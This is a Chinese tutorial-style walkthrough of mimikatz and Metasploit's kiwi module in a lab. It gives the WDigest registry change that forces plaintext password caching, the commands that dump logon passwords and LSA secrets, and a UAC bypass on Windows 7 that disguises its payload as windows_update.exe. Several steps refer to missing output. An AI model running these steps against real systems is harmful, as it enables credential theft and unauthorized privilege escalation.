下载地址:Releases · gentilkiwi/mimikatz · GitHub
安装流程(mimikatz在Windows上使用老出错,所以我在linux上连接本机使用的)
使用详情:
用msfvenom控制本机
加载mimkatz
load kiwi
查看命令
查看当前目录
查看当前目录下的内容
尝试下载666.png
下载成功!
mimikatz命令参数
cls: 清屏
standard: 标准模块,基本命令
crypto: 加密相关模块
sekurlsa: 与证书相关的模块
kerberos: kerberos模块
privilege: 提权相关模块
process: 进程相关模块
serivce: 服务相关模块
lsadump: LsaDump模块
ts: 终端服务器模块
event: 事件模块
misc: 杂项模块
token: 令牌操作模块
vault: Windows 、证书模块
minesweeper:Mine Sweeper模块
net:
dpapi: DPAPI模块(通过API或RAW访问)[数据保护应用程序编程接口]
busylight: BusyLight Module
sysenv: 系统环境值模块
sid: 安全标识符模块
iis: IIS XML配置模块
rpc: mimikatz的RPC控制
sr98: 用于SR98设备和T5577目标的RF模块
rdm: RDM(830AL)器件的射频模块
acr: ACR模块
version: 查看版本
exit: 退出
测试实验
内网渗透神器(Mimikatz)——使用教程_W小哥1的博客-CSDN博客
⚠️当目标为 win10 或 2012R2 以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
-
获取 windows 密码
(1)首先打开 mimikatz2.1,该版本分为 32 位和 64 位,可根据自己计算机的操作系统进行相应选择(若不知道自己的操作系统位数,请鼠标右键点击“计算机”-“属性”,在系统类型中即可知晓。) mimikatz 许多功能都需要管理员权限,如果不是管理员权限不能 debug,所以右键以管理员身份运行
(2)打开之后先输入 privilege::debug //提升权限。
(3)输入 sekurlsa::logonpasswords //抓取密码。
Kiwi Commands
=============
Command Description
------- -----------
creds_all Retrieve all credentials (parsed)检索所有凭据(已解析)
creds_kerberos Retrieve Kerberos creds (parsed) 检索Kerberos凭据(已解析)
creds_livessp Retrieve Live SSP creds 检索Live SSP凭据
creds_msv Retrieve LM/NTLM creds (parsed) 检索LM/NTLM凭据(已解析)
creds_ssp Retrieve SSP creds 检索SSP凭据
creds_tspkg Retrieve TsPkg creds (parsed) 检索TsPkg凭据(已解析)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync (unparsed) 通过DCSync检索用户帐户信息(未解析)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync 通过DCSync检索用户帐户NTLM哈希、SID和RID
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed) 列出所有Kerberos票证(未解析)
kerberos_ticket_purge Purge any in-use kerberos tickets 清除
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed) 转储LSA SAM(未解析)
lsa_dump_secrets Dump LSA secrets (unparsed) 转储LSA secrets(未解析)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)
(1)通过在目标主机(Windows 7)上运行 kali 创建的可执行文件木马程序 backup.exe,获取一个远程会话。如下所示
(2)确认目标用户的权限。执行命令如下所示
报错说明 windows 需要 UAC 认证,所以接下来需要绕过 UAC 将之前连接到的 win7 先放到 session 中,使用攻击负载exploit/windows/local/ask
,并设置 fliename(随便设置个:windows_update.exe)这是为了欺骗 windows,然后设置 session 为之前的 session 1
开启监听,之后 win7 会弹出是否授权窗口,点击 ok,此时在执行 getsystem 就会获得系统权限
tips:注意,运行此工具执行命令需要管理员权限,所以我个人建议在内网渗透中首先应该进行提权,再进行后续操作。
从输出信息中,可以看到当前用户已经是系统权限。此时,就可以进行其他操作了。
(3)加载 mimikatz 模块。执行命令如下所示: ==最新版 kali 加载 mimikatz 的命令为:load kiwi==
(4)查看 mimikatz 模块下有效的命令。执行命令如下所示
(5)执行命令
-
恢复哈希密码
- 获取 kerberos(网络认证协议)信息。执行命令如下所示
- 恢复 livessp 身份验证信息。执行命令如下所示: